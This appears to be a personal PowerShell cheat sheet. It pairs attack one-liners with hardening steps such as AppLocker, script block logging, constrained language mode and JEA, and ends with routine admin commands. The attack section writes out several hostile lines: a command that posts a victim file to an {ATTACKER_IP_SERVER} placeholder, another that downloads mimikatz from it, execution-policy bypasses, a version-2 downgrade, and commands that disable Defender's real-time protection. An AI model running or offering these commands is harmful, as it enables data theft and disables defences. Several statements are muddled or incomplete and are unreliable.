
Personal sheet for PowerShell 🧢

GNU General Public License v3.0GPL-3.0

PowerShell Commands

Personal sheet for PowerShell 🧢

TO BE CONTINUED indefinitely...

GitHub last commit

Attacking techniques: practical examples

HTTP requests

Exfiltrate data

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri https://{ATTACKER_IP_SERVER} -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Victim\path\to\data.xml')))

Download attacking tools

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -Method GET -uri https://{ATTACKER_IP_SERVER}/exec/mimikatz.exe -OutFile "c:\Users\Victim\mimi.exe"

Bypass Execution policy

PowerShell.exe -noprofile -executionpolicy bypass -file .\malicious.ps1


Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force

Setting the execution policy to RemoteSigned only allows running unsigned scripts.

Exploit debugging variables


If this env var is set on production, there's a chance admins think it's a safety measure.

Place a downgrade attack

PowerShell.exe -Version 2

Older versions of PS have less security features according to the unicorn.

Run PowerShell commands without PowerShell.exe

You can use p0wnedShell or the more recent PowerLessShell.

Disable critical protections

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

Attack RDP connections

If admins use misconfigured RDP (remote desktop protocol) for remoting, it can be Brute-Forced to pass malicious cmdlets.


Limit unconstrained code execution

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Default since PowerShell v5 if you use AppLocker.

Use Applocker


Overview by Microsoft

cmdlets for AppLocker

Get the current AppLocker configuration
Get-AppLockerPolicy -Effective

Create an AppLocker policy


Test an exec against the AppLocker policy

Test-AppLockerPolicy -Path <path_to_exec>

Add GPOs (Group policies)

Enable Module and Script block logging

Go to Windows Configuration > Policies > Administrative Settings > Windows Components > Windows PowerShell

  • Turn on Module Logging
  • Turn on PowerShell Script Block Logging

or with PowerShell:

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging"  -Name EnableModuleLogging -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockInvocationLogging -Value "1"

Then, it's possible to connect logs to a SIEM or a similar software.

Enable transcripting

GPO or:

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableInvocationHeader" -Value "1"

Enable Protected Event Logging

Go to Windows Components -> Administrative Templates -> Event Logging: "Enable Protected Event Logging." You 'll have to provide a valid certificate.


Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EnableProtectedEventLogging" -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EncryptionCertificate" -Value $Certificate

Where $Certificate is your certificate.

Set Execution policy

Set-executionpolicy restricted

restricted should be default, but check it.


Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root

More advanced tricks there

Challenges for attackers

Some attacks attempt to modify settings and disable some protections. There are important inconveniences for attackers, though:

  • most commands require an elevated shell
  • notifications are sent by default
  • Windows events are triggered by default

Suspicious Cmdlets

Many legitimate commands like Invoke-WebRequest can be exploited by attackers, but some cmdlets look more suspicious than others. Here are a few examples:

  • Invoke-Mimikatz
  • Invoke-ShellCode
  • Get-FileHash
  • Invoke-DllInjection
  • Get-Hotfix | measure

It often means attackers used a known tool (e.g, PowerSploit, Mimikatz, Powercat) or performed advanced enumeration.

Enable JEA

JEA (Just Enough Administration) allows more control over PowerShell, especially if you need more granularity on cmdlets and security for remoting.

Source: Microsoft JEA

Misc: other helpful commands

Get list of installed software

Get-WmiObject Win32_Product | Select-Object Name

Get list of running processes


Get network connections


Get active firewall rules


Get list of scheduled tasks


Get event logs

Get-EventLog -LogName Security

Search for specific event logs

Get-EventLog -LogName Security | Where-Object {$_.EventID -eq <event_id>}

Get list of local user accounts


Get list of local group accounts


Get list of environment variables

Get-ChildItem Env:

Get list of services


Start a service

Start-Service -Name <service>

Stop a service

Stop-Service <service>

Stop a running process

Stop-Process -Name <process>

Remove a scheduled task

Unregister-ScheduledTask -TaskName <task>

Disable a firewall rule

Disable-NetFirewallRule -DisplayName <rule>